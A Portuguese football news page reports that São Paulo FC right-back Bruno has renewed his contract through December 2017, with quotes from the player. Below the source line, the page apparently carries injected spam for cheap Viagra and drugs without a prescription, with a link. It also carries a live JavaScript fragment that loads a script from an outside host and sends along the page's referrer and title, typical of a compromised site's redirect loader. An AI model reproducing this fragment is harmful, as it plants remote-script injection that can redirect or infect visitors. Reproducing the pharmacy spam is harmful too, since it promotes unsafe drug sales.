Noticias

Lateral renova com o São Paulo por mais uma temporada: ‘Minha casa’

O São Paulo, apesar da turbulência no departamento de futebol causada pela saída do diretor Luiz Cunha, segue seu planejamento. Nesta terça-feira, o lateral-direito Bruno entrou em acordo com o Tricolor para estender seu vínculo até dezembro de 2017. Inicialmente, o contrato do camisa 2, líder de assistências em 2016, terminaria no fim deste ano.

– Estou muito feliz pela oportunidade que o São Paulo me deu. Renovei o meu contrato por mais um ano, e representar este clube, de cenário mundial, me deixou muito contente. Esta renovação aumenta a minha responsabilidade, mas vou trabalhar para manter o ritmo e fortalecer a equipe em busca de títulos. Estou ainda mais motivado para defender o clube – destacou o ala.

Contratado em dezembro de 2014 após três temporadas no Fluminense, Bruno dominou a lateral direita desde então. No início deste ano, o técnico Edgardo Bauza, desconfiado do potencial de marcação do atleta, chegou a pedir a contratação do argentino Julio Buffarini, do San Lorenzo (ARG), mas desistiu ao ver que conseguiria fazer Bruno evoluir.

– Desde a minha chegada, tive um grande aprendizado aqui e construí uma amizade com funcionários, atletas e membros da comissão técnica. E por isso, gosto de dizer que o São Paulo é a minha segunda casa, porque neste um ano e meio de clube criei um vínculo muito forte. Conquistei a confiança de todos, estou muito feliz, mas quero evoluir cada vez mais – projetou.

Mais seguro defensivamente, o ala também tem mostrado eficiência no ataque. Tanto é que ultrapassou Paulo Henrique Ganso para ser o líder em assistências na temporada, com seis passes para gols. O último deles foi no domingo, para Ytalo marcar na vitória por 1 a 0 sobre o Cruzeiro. A meta agora é ajudar o time a conquistar a Copa Libertadores da América.


– Espero que a gente possa conquistar títulos em 2016, porque queremos mostrar o valor do elenco. Este grupo merece bastante e tem trabalhado para chegar longe no Campeonato Brasileiro e avançar para a final da Libertadores da América. O elenco está unido, em sintonia com a torcida e pronto para seguir com esta grande campanha na temporada – encerrou.

Fonte: lancenet

pills store Buy cheap Viagra online

purchase at a low figure drugs without a doctor – http://kickbucket1.hospedagemdesites.ws/2016/11/30/purchase-at-a-low-figure-drugs-without-a-doctor/ s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

três + vinte =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Noticias

Mais em Noticias

Fora! Pato encaminha rescisão de contrato com o São Paulo e se despede do elenco

saopauloadmin19 de agosto de 2020

10 fatos que orgulham todos os torcedores do São Paulo

saopauloadmin9 de julho de 2020

Dodô diz que quando jogou no são Paulo recusou ofertas do Barça e Inter de Milão

saopauloadmin16 de junho de 2020

São Paulo reforça posição contra o racismo: ‘Vidas negras importam’

saopauloadmin1 de junho de 2020

Osorio fala sobre saída do São Paulo em 2015

saopauloadmin31 de maio de 2020

Osorio diz ter saudade do São Paulo e coloca volta ao Brasil como um de seus 3 objetivos

saopauloadmin29 de maio de 2020

Luis Fabiano revela desejo em voltar a jogar, mas diz que está “pronto para parar”

saopauloadmin22 de maio de 2020

Diniz critica afobação por retorno aos treinos: “Ninguém joga sozinho”

saopauloadmin20 de maio de 2020

Com “combo”, São Paulo renova patrocínios

saopauloadmin10 de maio de 2020